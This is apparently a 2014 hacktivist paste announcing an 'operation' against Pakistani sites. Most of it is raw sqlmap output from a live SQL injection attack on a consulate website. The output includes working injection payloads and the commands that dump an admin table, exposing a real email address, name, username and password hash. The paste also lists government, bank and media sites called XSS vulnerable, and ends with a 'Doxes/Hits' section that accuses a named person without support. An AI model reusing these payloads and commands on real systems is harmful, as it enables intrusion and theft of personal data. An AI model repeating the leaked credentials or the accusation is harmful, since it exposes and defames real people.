Axid

Operation Pakistan September 6th-8th (Axid)

Dec 11th, 2014
  4.  
  5. http://en.wikipedia.org/wiki/G_Force_Pakistan
  6.  
  7.  
  8.  
  9. #Operation #Pakistan.
  10.  
  11. Hacking at its Finest.
  12.  
  13. ~XTAM4
  14.  
  15. ~Mr.Instinct
  16.  
  17. ~G Force Family
  18.  
  19. ~Corleone Family
  20.  
  21. #XTAM4
  22. Operation planned by: Mr.Instinct
  23. Main Contributors: Xtam4, Axid Burn and Balalaika.
  24.  
  25.  
  26.  
  27. Main Target: http://www.pakconsulatejeddah.gov.pk/index.php
  28.  
  29.  
  30.  
  31. [*] starting at 15:13:28
  32.  
  33. [15:13:31] [INFO] testing connection to the target URL
  34. [15:13:37] [INFO] testing if the target URL is stable. This can take a couple of seconds
  35. [15:13:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor
  36.  
  37. injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a
  38.  
  39. string or regular expression to match on
  40. how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
  41. [15:14:08] [INFO] testing if GET parameter 'option' is dynamic
  42. [15:14:09] [INFO] confirming that GET parameter 'option' is dynamic
  43. [15:14:11] [INFO] GET parameter 'option' is dynamic
  44. [15:14:12] [WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable
  45. [15:14:12] [INFO] testing for SQL injection on GET parameter 'option'
  46. [15:14:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  47. [15:14:13] [WARNING] reflective value(s) found and filtering out
  48. [15:14:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  49. [15:14:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  50. [15:14:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  51. [15:14:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  52. [15:15:01] [INFO] testing 'MySQL inline queries'
  53. [15:15:02] [INFO] testing 'PostgreSQL inline queries'
  54. [15:15:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  55. [15:15:06] [INFO] testing 'Oracle inline queries'
  56. [15:15:07] [INFO] testing 'SQLite inline queries'
  57. [15:15:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  58. [15:15:08] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as
  59.  
  60. possible (e.g. 10 or more)
  61. [15:15:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  62. [15:15:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  63. [15:15:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  64. [15:15:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  65. [15:15:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  66. [15:16:01] [INFO] testing 'Oracle AND time-based blind'
  67. [15:16:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  68. [15:17:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  69. [15:17:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly
  70.  
  71. set it using option '--dbms'
  72. [15:19:43] [WARNING] GET parameter 'option' is not injectable
  73. [15:19:43] [INFO] testing if GET parameter 'item' is dynamic
  74. [15:19:44] [INFO] confirming that GET parameter 'item' is dynamic
  75. [15:19:45] [INFO] GET parameter 'item' is dynamic
  76. [15:19:45] [WARNING] heuristic (basic) test shows that GET parameter 'item' might not be injectable
  77. [15:19:45] [INFO] testing for SQL injection on GET parameter 'item'
  78. [15:19:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  79. [15:20:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  80. [15:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  81. [15:20:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  82. [15:20:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  83. [15:20:44] [INFO] testing 'MySQL inline queries'
  84. [15:20:45] [INFO] testing 'PostgreSQL inline queries'
  85. [15:20:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  86. [15:20:50] [INFO] testing 'Oracle inline queries'
  87. [15:20:52] [INFO] testing 'SQLite inline queries'
  88. [15:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  89. [15:21:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  90. [15:21:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  91. [15:21:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  92. [15:21:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  93. [15:21:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  94. [15:21:47] [INFO] testing 'Oracle AND time-based blind'
  95. [15:21:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  96. [15:23:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  97. [15:25:16] [WARNING] GET parameter 'item' is not injectable
  98. [15:25:16] [INFO] testing if GET parameter 'item_id' is dynamic
  99. [15:25:17] [INFO] confirming that GET parameter 'item_id' is dynamic
  100. [15:25:18] [INFO] GET parameter 'item_id' is dynamic
  101. [15:25:19] [INFO] heuristic (basic) test shows that GET parameter 'item_id' might be injectable (possible DBMS: 'PostgreSQL or
  102.  
  103. MySQL')
  104. [15:25:19] [INFO] testing for SQL injection on GET parameter 'item_id'
  105. heuristic (parsing) test showed that the back-end DBMS could be 'PostgreSQL or MySQL'. Do you want to skip test payloads specific
  106.  
  107. for other DBMSes? [Y/n] y
  108. do you want to include all tests for 'PostgreSQL or MySQL' extending provided level (1) and risk (1)? [Y/n] y
  109. [15:25:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  110. [15:26:15] [INFO] GET parameter 'item_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  111. [15:26:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  112. [15:26:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  113. [15:26:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
  114. [15:26:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
  115. [15:26:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  116. [15:26:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
  117. [15:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  118. [15:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
  119. [15:26:58] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
  120. [15:27:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
  121. [15:27:06] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
  122. [15:27:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
  123. [15:27:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
  124. [15:27:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
  125. [15:27:12] [INFO] testing 'PostgreSQL error-based - Parameter replace'
  126. [15:27:13] [INFO] testing 'MySQL inline queries'
  127. [15:27:15] [INFO] testing 'PostgreSQL inline queries'
  128. [15:27:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  129. [15:27:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  130. [15:27:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  131. [15:27:21] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
  132. [15:27:23] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
  133. [15:27:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  134. [15:27:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
  135. [15:27:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
  136. [15:27:52] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
  137. [15:28:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  138. [15:28:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
  139. [15:28:10] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
  140. [15:28:12] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
  141. [15:28:16] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
  142. [15:29:16] [INFO] GET parameter 'item_id' is 'MySQL > 5.0.11 OR time-based blind' injectable
  143. [15:29:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  144. [15:29:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other
  145.  
  146. potential injection technique found
  147. [15:29:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query
  148.  
  149. columns. Automatically extending the range for current UNION query injection technique test
  150. [15:29:28] [INFO] target URL appears to have 13 columns in query
  151. [15:30:01] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  152. GET parameter 'item_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  153. sqlmap identified the following injection points with a total of 429 HTTP(s) requests:
  154. ---
  155. Place: GET
  156. Parameter: item_id
  157. Type: boolean-based blind
  158. Title: AND boolean-based blind - WHERE or HAVING clause
  159. Payload: option=page&item=show&item_id=51 AND 2145=2145
  160.  
  161. Type: UNION query
  162. Title: MySQL UNION query (NULL) - 13 columns
  163. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  164.  
  165. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  166.  
  167. Type: AND/OR time-based blind
  168. Title: MySQL > 5.0.11 OR time-based blind
  169. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  170. ---
  171. [15:32:31] [INFO] the back-end DBMS is MySQL
  172. web application technology: Apache 2.2.23, PHP 5.2.17
  173. back-end DBMS: MySQL 5.0.11
  174. [15:32:31] [INFO] fetching database names
  175. [15:32:47] [INFO] the SQL query used returns 3 entries
  176. [15:32:49] [INFO] retrieved: "information_schema"
  177. [15:32:50] [INFO] retrieved: "pakcons_consulate"
  178. [15:32:58] [INFO] retrieved: "pakcons_tns"
  179. available databases [3]:
  180. [*] information_schema
  181. [*] pakcons_consulate
  182. [*] pakcons_tns
  183.  
  184. [15:32:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  185.  
  186. [*] shutting down at 15:32:58
  187.  
  188. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate --
  189.  
  190. tables
  191.  
  192. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  193. http://sqlmap.org
  194.  
  195. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  196.  
  197. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  198.  
  199. any misuse or damage caused by this program
  200.  
  201. [*] starting at 15:34:27
  202.  
  203. [15:34:27] [INFO] resuming back-end DBMS 'mysql'
  204. [15:34:29] [INFO] testing connection to the target URL
  205. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  206. ---
  207. Place: GET
  208. Parameter: item_id
  209. Type: boolean-based blind
  210. Title: AND boolean-based blind - WHERE or HAVING clause
  211. Payload: option=page&item=show&item_id=51 AND 2145=2145
  212.  
  213. Type: UNION query
  214. Title: MySQL UNION query (NULL) - 13 columns
  215. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  216.  
  217. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  218.  
  219. Type: AND/OR time-based blind
  220. Title: MySQL > 5.0.11 OR time-based blind
  221. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  222. ---
  223. [15:34:34] [INFO] the back-end DBMS is MySQL
  224. web application technology: Apache 2.2.23, PHP 5.2.17
  225. back-end DBMS: MySQL 5.0.11
  226. [15:34:34] [INFO] fetching tables for database: 'pakcons_consulate'
  227. [15:34:38] [INFO] the SQL query used returns 23 entries
  228. [15:34:39] [INFO] retrieved: "admin"
  229. [15:34:41] [INFO] retrieved: "blocks"
  230. [15:34:43] [INFO] retrieved: "gallery"
  231. [15:34:45] [INFO] retrieved: "gallery_images"
  232. [15:34:46] [INFO] retrieved: "news"
  233. [15:34:48] [INFO] retrieved: "pages"
  234. [15:34:52] [INFO] retrieved: "report_files"
  235. [15:34:53] [INFO] retrieved: "reports"
  236. [15:34:55] [INFO] retrieved: "slideshow"
  237. [15:34:56] [INFO] retrieved: "url_alias"
  238. [15:34:58] [INFO] retrieved: "users"
  239. [15:35:01] [INFO] retrieved: "videos"
  240. [15:35:02] [INFO] retrieved: "wp_commentmeta"
  241. [15:35:04] [INFO] retrieved: "wp_comments"
  242. [15:35:07] [INFO] retrieved: "wp_links"
  243. [15:35:09] [INFO] retrieved: "wp_options"
  244. [15:35:10] [INFO] retrieved: "wp_postmeta"
  245. [15:35:11] [INFO] retrieved: "wp_posts"
  246. [15:35:13] [INFO] retrieved: "wp_term_relationships"
  247. [15:35:15] [INFO] retrieved: "wp_term_taxonomy"
  248. [15:35:16] [INFO] retrieved: "wp_terms"
  249. [15:35:17] [INFO] retrieved: "wp_usermeta"
  250. [15:35:18] [INFO] retrieved: "wp_users"
  251. Database: pakcons_consulate
  252. [23 tables]
  253. +-----------------------+
  254. | admin |
  255. | blocks |
  256. | gallery |
  257. | gallery_images |
  258. | news |
  259. | pages |
  260. | report_files |
  261. | reports |
  262. | slideshow |
  263. | url_alias |
  264. | users |
  265. | videos |
  266. | wp_commentmeta |
  267. | wp_comments |
  268. | wp_links |
  269. | wp_options |
  270. | wp_postmeta |
  271. | wp_posts |
  272. | wp_term_relationships |
  273. | wp_term_taxonomy |
  274. | wp_terms |
  275. | wp_usermeta |
  276. | wp_users |
  277. +-----------------------+
  278.  
  279. [15:35:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  280.  
  281. [*] shutting down at 15:35:18
  282.  
  283. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T
  284.  
  285. admin --columns
  286.  
  287. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  288. http://sqlmap.org
  289.  
  290. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  291.  
  292. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  293.  
  294. any misuse or damage caused by this program
  295.  
  296. [*] starting at 15:36:44
  297.  
  298. [15:36:45] [INFO] resuming back-end DBMS 'mysql'
  299. [15:36:47] [INFO] testing connection to the target URL
  300. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  301. ---
  302. Place: GET
  303. Parameter: item_id
  304. Type: boolean-based blind
  305. Title: AND boolean-based blind - WHERE or HAVING clause
  306. Payload: option=page&item=show&item_id=51 AND 2145=2145
  307.  
  308. Type: UNION query
  309. Title: MySQL UNION query (NULL) - 13 columns
  310. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  311.  
  312. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  313.  
  314. Type: AND/OR time-based blind
  315. Title: MySQL > 5.0.11 OR time-based blind
  316. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  317. ---
  318. [15:36:51] [INFO] the back-end DBMS is MySQL
  319. web application technology: Apache 2.2.23, PHP 5.2.17
  320. back-end DBMS: MySQL 5.0.11
  321. [15:36:51] [INFO] fetching columns for table 'admin' in database 'pakcons_consulate'
  322. [15:36:56] [INFO] the SQL query used returns 5 entries
  323. [15:36:57] [INFO] retrieved: "id","int(11)"
  324. [15:36:58] [INFO] retrieved: "full_name","varchar(100)"
  325. [15:36:59] [INFO] retrieved: "username","varchar(100)"
  326. [15:37:01] [INFO] retrieved: "password","varchar(100)"
  327. [15:37:03] [INFO] retrieved: "email","varchar(100)"
  328. Database: pakcons_consulate
  329. Table: admin
  330. [5 columns]
  331. +-----------+--------------+
  332. | Column | Type |
  333. +-----------+--------------+
  334. | email | varchar(100) |
  335. | full_name | varchar(100) |
  336. | id | int(11) |
  337. | password | varchar(100) |
  338. | username | varchar(100) |
  339. +-----------+--------------+
  340.  
  341. [15:37:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  342.  
  343. [*] shutting down at 15:37:03
  344.  
  345. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51%27" -D pakcons_consulate
  346.  
  347. -T admin -C email,full_name,id,password,username --dump
  348.  
  349. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  350. http://sqlmap.org
  351.  
  352. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  353.  
  354. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  355.  
  356. any misuse or damage caused by this program
  357.  
  358. [*] starting at 15:38:20
  359.  
  360. [15:38:20] [WARNING] it appears that you have provided tainted parameter values ('item_id=51'') with most probably leftover
  361.  
  362. chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to
  363.  
  364. properly run
  365. Are you sure you want to continue? [y/N] n
  366.  
  367. [*] shutting down at 15:38:33
  368.  
  369. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T
  370.  
  371. admin -C email,full_name,id,password,username --dump
  372.  
  373. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  374. http://sqlmap.org
  375.  
  376. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  377.  
  378. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  379.  
  380. any misuse or damage caused by this program
  381.  
  382. [*] starting at 15:39:08
  383.  
  384. [15:39:08] [INFO] resuming back-end DBMS 'mysql'
  385. [15:39:11] [INFO] testing connection to the target URL
  386. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  387. ---
  388. Place: GET
  389. Parameter: item_id
  390. Type: boolean-based blind
  391. Title: AND boolean-based blind - WHERE or HAVING clause
  392. Payload: option=page&item=show&item_id=51 AND 2145=2145
  393.  
  394. Type: UNION query
  395. Title: MySQL UNION query (NULL) - 13 columns
  396. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  397.  
  398. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  399.  
  400. Type: AND/OR time-based blind
  401. Title: MySQL > 5.0.11 OR time-based blind
  402. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  403. ---
  404. [15:39:18] [INFO] the back-end DBMS is MySQL
  405. web application technology: Apache 2.2.23, PHP 5.2.17
  406. back-end DBMS: MySQL 5.0.11
  407. [15:39:18] [INFO] fetching columns 'email, full_name, id, password, username' for table 'admin' in database 'pakcons_consulate'
  408. [15:39:18] [INFO] the SQL query used returns 5 entries
  409. [15:39:19] [INFO] retrieved: "id","int(11)"
  410. [15:39:21] [INFO] retrieved: "full_name","varchar(100)"
  411. [15:39:22] [INFO] retrieved: "username","varchar(100)"
  412. [15:39:23] [INFO] retrieved: "password","varchar(100)"
  413. [15:39:24] [INFO] retrieved: "email","varchar(100)"
  414. [15:39:24] [INFO] fetching entries of column(s) 'email, full_name, id, password, username' for table 'admin' in database
  415.  
  416. 'pakcons_consulate'
  417. [15:39:24] [INFO] the SQL query used returns 1 entries
  418. [15:39:25] [INFO] retrieved: "amirrkkhan@gmail.com","M. Amir Khan","1","1c677...
  419. [15:39:25] [INFO] analyzing table dump for possible password hashes
  420. [15:39:25] [INFO] recognized possible password hashes in column 'password'
  421. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
  422. [15:39:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-8nqFtk.txt'
  423. do you want to crack them via a dictionary-based attack? [Y/n/q] n
  424. Database: pakcons_consulate
  425. Table: admin
  426. [1 entry]
  427. +----+----------------------+-------------+----------------------------------+--------------+
  428. | id | email | username | password | full_name |
  429. +----+----------------------+-------------+----------------------------------+--------------+
  430. | 1 | amirrkkhan@gmail.com | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan |
  431. +----+----------------------+-------------+----------------------------------+--------------+
  432.  
  433. [15:39:46] [INFO] table 'pakcons_consulate.admin' dumped to CSV file
  434.  
  435. '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk/dump/pakcons_consulate/admin.csv'
  436. [15:39:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  437.  
  438. -----------------------------------------------------------------------------------------------------------------
  439. #Mr.Instinct
  440.  
  457.  
  458. ----------------------------------------------------
  459. #Axid Burn
  460.  
  461.  
  472.  
  473.  
  474. ----------------------------------------------------
  475. #El-Capitân Balalaika
  476.  
  477.  
  478. http://www.faisalabadpolice.gov.pk/
  479. admin panel not found
  480.  
  481. http://www.faisalabadpolice.gov.pk/page.php
  482. XSS vulnerable
  483.  
  529.  
  530.  
  531. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  532.  
  533. http://sbp.org.pk
  534.  
  535. Entire site is XSS vulnerable
  536.  
  537. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  538.  
  539. http://www.aaj.tv/
  540.  
  541. XSS vulnerable 83+
  542.  
  543.  
  544. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  545.  
  546.  
  547.  
  548.  
  549. Doxes/Hits:
  550.  
  551.  
  552. John O Brennan
  553.  
  568.  
  569. John O Brennan armed Al Qaeda, and Tehreek-E-Taliban in Pakistan.